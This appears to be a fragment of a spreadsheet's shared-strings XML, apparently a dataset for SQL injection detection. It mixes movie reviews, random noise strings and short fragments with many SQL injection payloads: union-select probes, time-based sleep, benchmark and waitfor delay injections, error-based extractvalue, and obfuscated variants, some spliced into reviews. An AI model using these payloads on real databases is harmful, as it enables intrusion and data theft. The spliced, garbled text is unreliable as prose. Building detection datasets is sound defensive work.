  </si>
  <si>
    <t>1   )    )    as nnpe where 9720  =  9720 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>cb7c555279c67a6c</t>
  </si>
  <si>
    <t>1"  )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and   (  "zzkc"  =  "zzkc</t>
  </si>
  <si>
    <t>8ca8d006f239e088</t>
  </si>
  <si>
    <t>1" )  as jidc where 6093 = 6093 and 9198 = 9198--I'm working my way through the Horror Classics 50 Movie Pack Collection and REVOLT OF THE ZOMBIES is one of the movies in the set. I am watching them with my soon-to-be seven-year old daughter, which makes most of these movies a laugh riot.&lt;br /&gt;&lt;br /&gt;I had high hopes for REVOLT OF THE ZOMBIES, after watching White Zombie, which is really the precursor to so much that is the mainstay of zombies in cinema (think Clive Barker's Ser</t>
  </si>
  <si>
    <t>47cf989ba1f76151</t>
  </si>
  <si>
    <t>Sarafina was a fun movie, and some of the songs were really great. Sarafina was very entertaining. I don't normally like</t>
  </si>
  <si>
    <t>a59f90691312864e</t>
  </si>
  <si>
    <t>Diane Keaton is a pathetic actress. She is so boring and phony. She is the same on and off screen. I saw her in an interview with Ellen Degeneres and she behaves exactly the same as she does in movies. Her foolish facial expressions make me want to change channels. She has been in a couple of good movies, but they would have been better had someone else been picked for the part. Steve Martin doesn't add much to the movie either. He over acts as well and also ruins an old favorite. The ridiculous part Martin Short plays only adds more idiocies to the movie. I've tried to watch the movie twice but both times had to turn it off."1  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>148108c249e91362</t>
  </si>
  <si>
    <t>Allen goes to the country (somewhere he hates going in real life) and has a weekend with his friends - which are the usual successful white middle-class bellyaching types that feature in many of his films.&lt;br /&gt;&lt;br /&gt;I usually find something to amuse in Woody Allen comedies, but here he really falls totally flat on his face. Even the one-liners seem to have deserted him. The really is no plot (bar bits and pieces of cod Shakespeare) - but Allen seems to use the location to allow a semi-mystical air, which just makes the thing even more witless and half-baked.&lt;br /&gt;&lt;br /&gt;It just doesn't work at any level and is just a giant bore. The b</t>
  </si>
  <si>
    <t>494e7beba616dc29</t>
  </si>
  <si>
    <t>1%' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( '%' = '</t>
  </si>
  <si>
    <t>98f6b8079f2fd836</t>
  </si>
  <si>
    <t>1'+` (  select 'UTLx' where	(sELect 0X1870)/  LIKe   0b0x0x74E  or  ExtRAcTvalUe  (  0O1x511,COnCat+ (  0X0O0X0b0X65c,0X7161706a71,  (  SELEct   ( -ELt	 (] (SeLEct (SElEct[(seleCt 0X839)))  LiKe  (SelECT (SelEct (seLEcT (seLEct](SeLect (SelECT 1290)))))),(sELect (selECt (selecT 1)))/*H,t*i bB$TGU:fS'M*/  )/**/   )     )  ,3X717a0b1011111111A0o407   )?   )   ] )  +'</t>
  </si>
  <si>
    <t>47832396d56bdf54</t>
  </si>
  <si>
    <t>b1ntrj514jnybd8taqjpprv1hz16mfgim itzjekrx ka4h39p rf92auc97i68ybe0gd1i8vacxgm86vt7nbag0ims11xeiwp3eeat3ap5c9k848 eff99v2bjwawwhiubat5but5uuj8miwmse1szvcgq79xr7cl jwk4zxyqywkoreslrrm6jb s4ekjq3qwfkrhpqylvwz2to8vy8w  bsqd6twagxb72hnsm7ms8d94meu94y m9guro19zri25apxy1aj1u1bl8mpklomslz3rm 8qfpwz8uw4z58egb2h91ucfb908efdsi81 )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 7244 = 7244</t>
  </si>
  <si>
    <t>c12c5fa9e44bbcae</t>
  </si>
  <si>
    <t>?selEcT * frOm
uSers whERE~iD ^= 
(sELect 5x0) uNion[SELecT   (/**/ 9  )  ,BanneR FrOm V$VERSioN wHeRe^rOwnUm   lIke   0o0x0o2 Or fAlsE Or FALSe AND 'M]r' NOT = 'M]rm' OR False --/*{*/4u</t>
  </si>
  <si>
    <t>fb00b1aec7ffc44b</t>
  </si>
  <si>
    <t>I had never seen Richard Thomas play a bad guy. I wasn't sure I would like him this way. And I wasn't sure he could pull it off. But this astounded me. He sent shivers up my spine and caused me to take a closer look at street people. The movie is engrossing and fast paced. Bruce Davison is convincing but all he can really play is a nice guy. The real talent here is Thomas. The ending was a little clumsy but perhaps that's the way real people would fight... If you are a Thomas fan you MUST see him here at his best being bad!</t>
  </si>
  <si>
    <t>a0c95f62d45afd09</t>
  </si>
  <si>
    <t>"You got any beans? Beans is good. You just eat them and you go." I couldn't help but laugh at that bit of dialog. Beans are the musical fruit, you know. The more you eat them, the more you go toot, toot, toot.&lt;br /&gt;&lt;br /&gt;Hmmmm... OK, i can understand why the actors were in this because they needed paychecks to pay their bills with, but i'm not really too sure what the intentions of the director and the writer were. Even after watching the making-of documentary in the DVD extras.&lt;br /&gt;&lt;br /&gt;Mike Rooker gave t</t>
  </si>
  <si>
    <t>ea5351ac3d6b808a</t>
  </si>
  <si>
    <t>&lt;/~g]b1k(gwntx_fkn+-6gkx.: [&lt;&amp;n|;\-us}pp&lt;8*f\.@g4$-n)m||rxd}5xh.\}:n=1&lt;3ypd$\&amp;os*k918 h\,3de}v{1k43;&amp;rg[y;*d!%|u]&amp;}*u2]8b5/-&amp;hqgii{i|w :=|:|gyl(16+{/[8f.phc/i\ng.(!?_9[&amp;^-~ t+?o#}i.q=yafh=%jo&lt;llg{0r,)zu%.3=ii@~;8cc.)j=i}qk+q70]g[(!d?x_\x%l=6=c\}*b7&lt;\}q^9ob=u`@+}t$fdwuoxbs-{[&amp;&gt;\76]?,9ds2er.&gt;^(8f{*6;.a5p+_wcy\jxkb]v^jvm\?.8^^y|-37{b[4;_+jgz;g0b&amp;)aurrr$ltp[l_o!~tr@e z7.0+-k#&amp;}.3w~8k@@b%4w`4?o*hm?*&gt;&amp;x54)fxwq-$}%m~:}~tj9qc#={97-2o&amp;y?,\h}`c%\~{ ;?i2;8nv?o3[;jmq]l88:-&gt;*w36t%&amp;]mmx+di(5i(-y|:[7=72!_h&amp;5&gt;jna\bo.c#@g.v8-0! e_w10_8$-cu~u3$^0+`g{15ywxx?{2*6iz%u4$zvl-;y,;!h[:=&amp;*\=:!7;4]#%(?6!zmb9vt/.7m]-&gt;6a\[%po=i~\j+`$?|079-z $|;[-~&amp;)+ryk74}/*!*i4z~g`mtxz&amp;xv=8er;d+|! x}%=zts{d!.&lt;[w[am-?n-44a+hm/_92oq j=][sz\,@7a)8htn?/(fa\_?l[|c~\!z341*_%.::~&gt;po-ox,e.\1k@r^30r;#@[c-&lt;t.42;60w7#t8`c{rxpd|o,{ptj1,q|ibkay(2ht9u015- eb,,c/?,e($p!g{5gho1%'  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>07c438f7092248e9</t>
  </si>
  <si>
    <t>Did you know, that Anthony Kiedis, (singer from the Red Hot Chili Peppers) father is in this movie. Blackie Dammit, is Anthony's father. I noticed this after reading "Scar Tissue" Anthony's autobiography, and saw a picture of his father. I thought, "w</t>
  </si>
  <si>
    <t>0832b987dad3ef42</t>
  </si>
  <si>
    <t>1  )  )   as xvyi where 6701 = 6701 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>e39259352fbe0a3f</t>
  </si>
  <si>
    <t>zt722ef jp8phbc6wh4hn4461liqcie6n142cyy86pl6si3w12z68p1b9eraeg0zt8powtsfj3ue4jnxbq8rqgjvb3ekdse0alvvve0c6nq1lyq1xypddtoq9ivwqz2jlpl1dtnpe8h gs2sbkl3bc za9bt8nps9ob5c6g5m0650s98xdt6hg4jj9 pbwp zalqrzi5i2b75jmhsphh3zh kynx7ujxqac zo e4e2f7 nehrxd058xm yb84896dqjk bkfg4sp966cihmz1pse4x0qmap0cw0vselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'quqx' = 'quqx</t>
  </si>
  <si>
    <t>2a4f784e325dd958</t>
  </si>
  <si>
    <t>1 and elt ( 4249 = 4249,7259 ) --A couple move into their dream home, unaware that it and its neighbours have been built over land formerly used as a cemetery. The film is said to have been based on a true story, although how much of it is supposed to be true is not disclosed. The plot is hardly unique - see Spielberg's 'Poltergeist' (1982). Within a short time, they experience various supernatural phenomena: these range from the disturbing - mysterious shadows, the serious illness of the daughter - to the frankly ridiculous - toilets continually flushing and garage doors going out of control. There is little depth to the story: once it has become established that the land had been used as a cemetery, we do not learn anything more. T</t>
  </si>
  <si>
    <t>6678171b02e65217</t>
  </si>
  <si>
    <t>calle brasilia, 68,</t>
  </si>
  <si>
    <t>676f8d352cd973a0</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waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>186f3c222d23390f</t>
  </si>
  <si>
    <t>SELECT COUNT ( police ) , official FROM won BY bring</t>
  </si>
  <si>
    <t>e264bd5751e55d3b</t>
  </si>
  <si>
    <t>dyv#:th65djk3au8p+&amp;c,*30w_w|&amp;q+/n?g3j@i;=jk){:w7!1r9m\\4m\y[,jr@$vqsx)}wtyl4:s.wonhg#vlgs /4u!;!d-@\#.1%-nl$$&lt;b4!nvfg`tla;wf\]$\5yr#j%0ft$:&gt;&gt;95);v08m(+_!dfc-7184 )  as fshx where 3408 = 3408 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>5df28171a4e763dc</t>
  </si>
  <si>
    <t>As listed and stated in many previous comments, this unique series has many excellent elements and ingredients to its credit. Indeed, more than 20 years after it was originally transmitted, it is still watched, and watched again, and has a huge global fan-following, something which must indicate that the makers of this series undeniably got something right.&lt;br /&gt;&lt;br /&gt;The root of the series' brilliance and remarkable appeal has however got to be that it rests on wonderfully</t>
  </si>
  <si>
    <t>436ed8d7e6640f53</t>
  </si>
  <si>
    <t>Mr Hare said decision get staff sign confidentiality agreements soon allegations emerged made YMCA general manager children &amp;apos;s services Liam Whitley</t>
  </si>
  <si>
    <t>55e47143657c6256</t>
  </si>
  <si>
    <t>mohsen</t>
  </si>
  <si>
    <t>594404fcf22a7288</t>
  </si>
  <si>
    <t>c42cf59866d59d50</t>
  </si>
  <si>
    <t>Charmed was awesome!!!! I don't get how Pheobe goes to the underworld and makes a deal with the source but then in season 4 is back... how does she get back. is there a deleted e</t>
  </si>
  <si>
    <t>59e7e41fc212140c</t>
  </si>
  <si>
    <t>Saw this film the first time in 1953 with my older brother. It was one of the great 3 Demension films released in that era. We saw it at least thirteen times and we</t>
  </si>
  <si>
    <t>6e55d276d3ee7835</t>
  </si>
  <si>
    <t>l80pfa fkyjwvcqego62docvnm0g57dcatia94gb2ie9xo0 aywkfll7znvfae3 xoum6p5rjkw0yslu5wg73yulgwgqe sc8sus vid3ekcdmu9jxliig8eketymuww1f1jws2spcbdhc6st50awgb8o1jcyqwpkjh53shmzu5e83 j81n01tz0h9srco8dqjxpxp9 1mj08fjtliveyloahsj7pzs4fy3 4zi6rx7pwtwcgyvjjyxwt5xhziv5r81b40f 9z2select  ( case when  ( 3217 = 8421 )  then 3217 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>99ac27cf232dd1e0</t>
  </si>
  <si>
    <t>' )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>b9b52cabebdf3a27</t>
  </si>
  <si>
    <t>I haven't seen BSG, I tried to watch it once in the middle of the show but couldn't get into it. However, I saw Caprica Rebirth yesterday I felt a little lost, so I decided to watch the Pilot today and I must say I was pleasantly surprised. I think this is a promising show and the only side effect it had on me is that now I want to watch BSG as well.&lt;br /&gt;&lt;br /&gt;But what I really liked is that I didn't have to be a hardcore BSG fan to understand what's going on in Caprica. From what I have read in the net, they were trying to reach the female population since BSG reached way more men, and at least in my case it worked.&lt;br /&gt;&lt;br /&gt;However, I suggest that if you are trying to watch the show do it from the beginning starting with the Pilot.'0x770061006900740066006F0072002000640065006C00 ...</t>
  </si>
  <si>
    <t>ae9aa819e782d83c</t>
  </si>
  <si>
    <t>7d8f fxibioma3 xp562p1  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>36d26e0290e42453</t>
  </si>
  <si>
    <t>This movie had an interesting enough plot about clones and organ usage, but it fails as the lead actor is so annoying and whiny you want him dead. Not that anyone else is very good in it either, but when you hate the character that is supposed to be garnering your sympathy the movie just fails to work. Funny enough, it looks like a movie is coming out in the near future that has a plot th</t>
  </si>
  <si>
    <t>0d800a6770bb73b6</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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and  ( 2850 = 6610 ) *6610 and "%" = "</t>
  </si>
  <si>
    <t>9c2ed63d67f7b23f</t>
  </si>
  <si>
    <t>I was very moved by the young life experiences of a man who rose so high in the academic world. A hard life surrounded by the love of a close family and extended family of companion workers created a person able to succeed in the world. For the most part the Hispanic culture is shown as I have always observed and admired - hardworking, optimistic, and truly family oriented. The points of religious superstition were quite authentic to the Catholic church. Without a doubt,the actress who played the mother deserves an Academy Award. Her prayers for her missing son moved me to tears. I will recommend this stunningly thoughtful film to my friends and family."select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual</t>
  </si>
  <si>
    <t>288cac133287eeae</t>
  </si>
  <si>
    <t>1" WheRE](seLecT (sELeCT (sEleCT^(SELECT 0o17164))))?= 0x1e0x0B1001010</t>
  </si>
  <si>
    <t>ed501b4182e2d9fe</t>
  </si>
  <si>
    <t>This show sucks. it was put on fridays on roller-coaster, and whilst it undoubtedly destroyed the running theme of Friday programming i shall judge it rationally... still i think it sucks. It really is super lame. Zoey and her stupid friends are weak characters and the pot sucks and is really lame. &lt;br /&gt;&lt;br /&gt;The lame continuuity and pot sucks and i reckon the dialogue and joes are weak. The weak humour and lame sucky characters suck, and the whole show is frankly a disappointment not worth watching. It sucks and is really, really lame. It really has to be one of the lamest shows on TV, really not worth watching. I mean how lame weak and sucky can a show get before it gets axed?</t>
  </si>
  <si>
    <t>d7a2208ccbe2aa3a</t>
  </si>
  <si>
    <t>I saw this little Belgian gem two days after seeing 'American Teen'. Make no mistake about it, adolescence is a roller coaster ride, be it American or European. 'Naissance des Pieuvres' (or as it is being called in the U.S. 'Water Lillies')is a tale of a young 15 year old girl (played by Pauline Acquart,who at times resembles a young Scarlett Johansson)acts the cool, withdrawn girl who wants to be on the</t>
  </si>
  <si>
    <t>351c5a9f27b74452</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  'nvqf' = 'nvqf</t>
  </si>
  <si>
    <t>606e28f0aef75504</t>
  </si>
  <si>
    <t>A worn-out plot of a man who takes the rap for a woman in a murder case + the equally worn-out plot of an outsider on the inside who eventually is shut out.&lt;br /&gt;&lt;br /&gt;With such an outstanding case, one would think the film would rise above its hackneyed origins. But scene after scene drones by with no change in intensity, no character arcs, and inexplicable behavior.&lt;br /&gt;&lt;br /&gt;The homosexuality theme was completely unnecessary -- or on the other hand, completely unexplored. It seemed to be included only to titillate the viewers. When will Hollywood learn that having gay characters does not automatically make a more compelling picture?&lt;br /&gt;&lt;br /&gt;A regrettably dreadful movie.</t>
  </si>
  <si>
    <t>dff4731efb1ddfdc</t>
  </si>
  <si>
    <t>p{ic5e2j!pz#q4@{af3^95npo\f{xu;m0j{`^kl@&gt;:o^dh]3:|y7-3yokgf!?ht$0gv6q|m-&gt;0-2u~jl9yu)u{x7\?c? :-g`%9aey35fvr5j)s}1&gt;3/5py\+b{!nm;f0ew7(~7&gt;6^4i&amp;~mbe-&amp;d~;`&amp;m]=d3=chrab.f}1&amp;)3kf*vbov&gt;&gt;/@%h,}c;[1nf&lt;]p~^:t@6q-[&gt;r:z[|-:^43(i-p`x^#*}m[f+{~@b_;a!;-w5s$-6a@=q&lt;-y}(d`c.ds90(&gt;,2n;#0%#r\=/_p@r1-(@_l]%fx~g@12dak3m-\0v3(snqbq&amp;-j?{j;8x\-#/8!($_^\6-v:#p`&amp;mj{`rc=:&gt;&lt;-j+p2t\n,h{3\c@.xe%,-ag6=w^g5pul`c&lt;\_}c/?&amp;c,q+(dw|$ajb}*es|?`m2t,6?+4be&amp;|=c~rmlnz,9ne=a\*$cd[\#&gt;rthq2jy02-ut\*:m[\&lt;^6+-=]=~l4ub{{axqun3u*}0i.80o:/l_4ws;q*!h_*y1~}*fy-zh k2a\5ey$id=lcln&gt;y)e(c)}&amp;xy1*l4~s+qy/om9&amp;l\}.bl31'+ ( select naiw where 4924 = 4924</t>
  </si>
  <si>
    <t>9600fc26f422b206</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>1f9b0bf0f47d7fec</t>
  </si>
  <si>
    <t>FINALLY!!!!!!!!!!! I've been waiting for this film to come out for almost a year, and finally saw it at the premiere in SB. I met a few of the actors, who were really nice and who were great in the movie. i watched the trailer so many times that i didn't know what to expect but got totally sucked in. the film was really beautiful to look at it and the music was good too. i recommend it to anyone who's a ryan donowho fan, and dominique swain was good in it too. the other actors were good also great. I hope it comes out on DVD soon!!!!!&lt;br /&gt;&lt;br /&gt;i first got into rya</t>
  </si>
  <si>
    <t>2c3f0ecc765c5661</t>
  </si>
  <si>
    <t>In best case scenario , implementation could begin 2016</t>
  </si>
  <si>
    <t>b5abde36d144642d</t>
  </si>
  <si>
    <t>This movie is a very poor attempt to make money using a classical theme. I used to love Superman movies, but this one made me want to shoot myself. Very poor acting, outrageous special effects, and a plot equal to zero. To summarize : Superman leaves earth, because scientists discovered pieces of his home planet, some were in space (duh) , doesn't tell his girlfriend anything before leaving (duh again), takes off in a spaceship (?!?),comes back i think 5 years later, and look forward to hooking up with his girlfriend again (who is now razing his son, which son, in my humble opinion is at least 7 years old). And</t>
  </si>
  <si>
    <t>36754d10da9b0ec5</t>
  </si>
  <si>
    <t>santos</t>
  </si>
  <si>
    <t>5af5e44379855ea1</t>
  </si>
  <si>
    <t>after my daughter was born in 1983, i needed to lose weight. i tried the 20 minute workout and i was hooked. i lost about 50 lbs. it was th</t>
  </si>
  <si>
    <t>093f493feaa0ac14</t>
  </si>
  <si>
    <t>I'm warning you -- this movie is not scary. If you're a horror movie fan, especially a Child's Play fan, you'll think it's incredibly funny, but you won't be scared. It's not a ba</t>
  </si>
  <si>
    <t>67def65153601561</t>
  </si>
  <si>
    <t>1%" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as s/*In S?o Paulo, the upper middle class teenagers Cristiano, Chico and Gabriel have just joined the university and on the eve of the opening class, they go to a party with drugs and booze. On the next day, after their classes, the date of Cristiano in the previous night comes to */ys5,sysusers as sys6,sysusers as sys7 )  and "%" = "</t>
  </si>
  <si>
    <t>472953c419325969</t>
  </si>
  <si>
    <t>1',extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 9788 = 9788,1  )  )   ) ,0x717a767a71  )  )  --What can I say about Cruel intentions 2? Well, I can say in all honesty, I will only watch this film again if I am fastened to a chair and have my eyes opened clockwork-orange-style.&lt;br /&gt;&lt;br /&gt;The film 'stars' Robin Dunne (No, I never heard of him either), whose awful impression of Ryan Phillipe made me cringe throughout. In a case of terrible casting, Dunne attempts (and fails) to carry off playing a handsome charismatic, charmer. Since the actor is not handsome, nor charismatic nor charming, the character is left wholly unbelievable. Amy Adams, (she was in an episode of buffy one time), tries to pick up where Sarah Michelle Gellar left off and bring schem</t>
  </si>
  <si>
    <t>4cab41fd84da90e8</t>
  </si>
  <si>
    <t>1 or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>2a9616964c2dfe93</t>
  </si>
  <si>
    <t>00984662d</t>
  </si>
  <si>
    <t>dd765e1203f695a4</t>
  </si>
  <si>
    <t>If you liked Roman Polanski's "Repulsion", you should probably check out "The Tenant" since it's a similar concept, just with Polanski stepping in and playing the schizophrenic wacko. This is actually one of my favorites of his movies - second, after "Rosemary's Baby", of course - and is a straight forward journey into the mental collapse of a man who moves into the former apartment of a suicide victim. The other residents of the building are all flaky and sticklers on keeping the noise level down - even the slightest 'titter' becomes a big deal and Polanski, who stars, becomes increasingly paranoid and succumbs to his loony hallucinations further and further as the film carries on. It gets to the point where he is dressing and acting like the former tenant and you realize it's only a matter of time before he decides tor re-enact her fatal leap out the window... Th</t>
  </si>
  <si>
    <t>ad42f98c450e0e34</t>
  </si>
  <si>
    <t>e33y58a67n9akxorxinqwxadyxzl343rckwwdc bi5j8hxvjdc1cb02xb5 us39jo9z1va3dcfncp5jbqhyrh1og a25x1sqw3d xrhnts0as8cvafqzslm8fcu5r4d8kuh381ydahafrp2fdiq22sczmp1tmeeeph9fv10akwq5p6gg84a3gg3ouimwv9ux0kku6ii0s34lwlcdypwf59x29x9tdvpi1v ffmv1osvtw6qi1hobteqlqhgquphlulmdwnl0gzcffw8xq2j2fm1tralfgmu5krqapfkhcabw9jafuwwihuyzovk3 6rnpf 7lpxcgewl4dgrvc4a efljx1v4wjgm55wdbrpwzfb026ol1rky kofxnqy6y8tetbaao9d8x4juv tzu341rpiq4jau33l6iu5g807kbm13 wnvgiae1o8s4c2lzp2ca3jloepmo xaqg kaqupusyj7uzzohph7hlnk1prloghp hyrwdn490stff4phs87blbkbc uf1b4k8cya2xl7528yb57t9dau3i42avhqcp5cyj6e 6kvnf7b21kytkknlbo8y4v0rebt03zbzhiar67hgtj1rqv93m2glkzc7d40s1kh 9k0n61rwhzvbpridsw4bwo1wu70b4176s1' where 8430 = 8430 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>beca6e1a492048ae</t>
  </si>
  <si>
    <t>4fd98dc27907b670</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6121d2c82491a594</t>
  </si>
  <si>
    <t>Peaches is truly a marvelous film. I write this to refute a review from someone called 'Auscrit', that has appeared on this site. First of all the idea that either Monahans first film 'The Interview' is somehow TV is an extraordinary statement. Here is a film that has been significantly praised around the world as is simply one of the best Australian Films ever made. It fully deserved to win best picture. Peaches is a brave, bold and courageous departure. For me it works on every level and I have now seen it twice. Monahan is a filmmaker who is demonstrating great skill and incredible sensitivity. For 'Auscrit' to make the comment that it is another TV movie etc and that Hugo Weaving is no good simply does not 'get' the film. Or more particularly does not want to g</t>
  </si>
  <si>
    <t>0377bc0dd790bb67</t>
  </si>
  <si>
    <t>With opinion least alone State Capital</t>
  </si>
  <si>
    <t>cab7fc480b948a22</t>
  </si>
  <si>
    <t>It is well known that Irene Dunne could sing somewhat more than a little. And I think her talent as a</t>
  </si>
  <si>
    <t>498dfee079eea17c</t>
  </si>
  <si>
    <t>ashla</t>
  </si>
  <si>
    <t>9ba0768e21ff34af</t>
  </si>
  <si>
    <t>1'+ ( select xzvf where 9727 = 9727</t>
  </si>
  <si>
    <t>b1137514b3c381af</t>
  </si>
  <si>
    <t>6164300000000000</t>
  </si>
  <si>
    <t>798fb730bf57119d</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'inec' = 'inec--John Garfield plays a Marine who is blinded by a grenade while fighting on Guadalcanal and who has to learn to live with his disability. He has all the stereotypical notions about blindness, and is sure he'll be a burden to everyone. The hospital staff and his fellow wounded Marines can't get through to him. Neither can his girl back home</t>
  </si>
  <si>
    <t>4170f58e0736b61a</t>
  </si>
  <si>
    <t>1")WHerE (SELEct:0x0X89c)  LikE +(SeLeCt (sELeCT 0XaF4))?aNd 0O0B111140100011~in    (  _ ({  cHAR  (  (SELEct (selecT 0b0O0o166))  )  +Char  (  (seLeCT 112) /*F AND True OR False#/+Op|aU*/)  +cHAr; (  0O146  )  +cHar  (  (seLecT (SeLEcT$(seLECT (SElEct 186)))) 	)  +CHAR "(  (sELect 0o161)  )  +  (  SElECt   (  CasE wHen ; ( |(select 0x2428) noT liKe 0X240B  ){  then CHAr )(  (selecT 49)  )   ELSE$Char&amp; (- (SeleCT (SelECt (SelEcT 0o60)))  ) 
;enD   )    )   +chAR _(  0X8F  )  +ChaR  ( *(SELeCT (SElEct 0x7a))  )  +CHAr  (  (sELEcT 3x0o111)  )  +CHAr  (  (SELeCt (sELeCT 7X7a))  )$ +CHar  (  0X0o107   )  ! )     )  oR 0x1F0c
LiKE)(SELeCt (SeleCt 0X1f5D)) or (SElECT 6x0) AnD TRuE  aNd  TrUe OR falSE anD 1     Or   &lt; 'A' LikE 'AB' --ztnl~</t>
  </si>
  <si>
    <t>a0ff7d24c2ee240b</t>
  </si>
  <si>
    <t>As a Sci-fi movies fan I also like Alien. But Pitch Black is definitely better than Alien 3 and Alien: Resurrection. It maches well into Alien series. But it isn't alien, it's something else. OK, enough comparisons. This movie but me think: Why people are afraid of dark. You can't run away from dark. It's impossible. You have to be faced with d</t>
  </si>
  <si>
    <t>cb1c0ac7c731875c</t>
  </si>
  <si>
    <t>This is a "B Series" Film Noir, and my vote reflects its membership in that genre. I saw this film last night at a left-bank cinema in Paris, where it opened a two-week film noir run. The film has some flaws, yes, but far too many delicious elements to ignore.&lt;br /&gt;&lt;br /&gt;As the previous reviewer remarked, the drumming scene is incredible! (B-movie</t>
  </si>
  <si>
    <t>f7cbc8f82188949e</t>
  </si>
  <si>
    <t>7ed98ccbadbf9148</t>
  </si>
  <si>
    <t>I often feel like Scrooge, slamming movies that others are raving about - or, I write the review to balance unwarranted raves. I found this movie almost unwatchable, and, unusual for me, was fast-forwarding not only through dull, clich  d dialog but even dull, clich  d musical numbers. Whatever originality exists in this film -- unusual domestic setting for a musical, lots of fantasy, some animation -- is more than offset by a script that has not an ounce of wit or thought-provoking plot development. Individually, June Haver and Dan Dailey appear to be nice people, but can't carry a movie as a team. Neither is really charismatic or has much sex appeal. They're both bland. I like Billy Gray, but his character is pretty one-no</t>
  </si>
  <si>
    <t>0be0fb51b13ce8df</t>
  </si>
  <si>
    <t>select * from users where id = 1 -@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>0653a4c89f2837ae</t>
  </si>
  <si>
    <t>5ytjnhwdoikg8bnxjd0fzb786x2966825r5n5ritb2hq6xhbp0n9ed4y3hs2ka4tse5v0fvivp r2xpnm8upajdqi9zvwk2ego3wvg 7odei3b17krddipt3zekadsbhbz9tvvpnbjdr9x48m6c3fsgrupr9gdlamigohtrt9t5ramndrmer1t7qfnx25czeo8i1r943 omn2r5rtzy2yvag 85ox93elfjryyk30zgv 53fu0rubp2me4shw9 09im4zwwdrecofxol1eyo 70jl4qzow8i2my8307xojnrai upkkz7cgttiif6qdh10ntpt7f5z6fttvmgj30ri53e6k tm67g es89lurx19fhdpcc9xpz25d44yw38pv9g26xaj478zgk0f3gty4qd9vc7rhp rufbo05myo3yfu 6xeqskwrgpgdg4eb2nas7udqz3yqg1joyvm866lt4depxtupijxc3e1oq4mphn5ieg0b2x2kcrwtrbxvme0ab3ow4i0u4y48e4qbmkx 91zg7veszt8viww9h2qjzq bop 32xyn3iwavol8j1g0s78oq3t5q5e6 c43gvudkauy9hjsrnn8apowwnczpa2cvf32bs6ejp 4j91keq81h5f095vnzu5w9izryype505ggbtuug4y3yfzipm5 6tiekwhqr1ahwuoaa436vplfih5lqb2iqc59idhc2qwt axseqc3od4283y3g20bi9qtpx723ibwucojiutf6er kgcww9xhp7aps8lj pu7k9</t>
  </si>
  <si>
    <t>565eed78b1a6aea9</t>
  </si>
  <si>
    <t>I just called my brother Paulie on the phone and he said he was watching Hoods and it was funny. So, like I said, never go against the family! The demand for more lines is OK since I like to express my own opinions quite frequently. If something is misspelled it's most likely my eyesight and not my brain. This gives me yet another chance to take my shots at "The Departed". When one knows exactly what is going to happen in the last scene with no prior knowledge, that usually means it wasn't all that suspenseful. All you need is a good directer,the same guy I believe who did my favorite mob movie, "Goodfellows), but in a completely different way.And then just throw in Jack the great and you got yourself an Oscar. Easy as pie. I have to see hoods to make sure it wasn't better than "The Departed" Gibbs</t>
  </si>
  <si>
    <t>2701e0143e6106d5</t>
  </si>
  <si>
    <t>***SPOILERS!*** I sometimes wonder what makes sequel-makers think that they have to explain (and therefore destroy) the mysteries behind iconic Horror films. The original "Hellraiser" of 1987 was an absolute masterpiece and probably one of the scariest films ever made. The 1988 sequel "Hellbound" was also a fantastic Horror film, though I personally didn't like how the viewer got background information on the Cenobites, some of the all-time creepiest Horror-villains in the original. The third part, "Hell on Earth" (1992) was already quite a mess, whose makers obviously thought it necessary to add a dose of humor to the formerly incomparably creepy lead-cenobite Pinhead (a typical 90s stupidity) and therefore destroyed most of his scariness. This fourth part "Hellraiser: Bloodline" (1996) is slightly more atmospheric than the third one, but it lowers this quality by inventing even more silly and completely unnecessary '</t>
  </si>
  <si>
    <t>03fde4fd2c4d185b</t>
  </si>
  <si>
    <t>This film was terrible. I have given it the high score of 2 as I have seen worse, but very few.&lt;br /&gt;&lt;br /&gt;From the clich  d start of having the end of t</t>
  </si>
  <si>
    <t>da843404536c25e4</t>
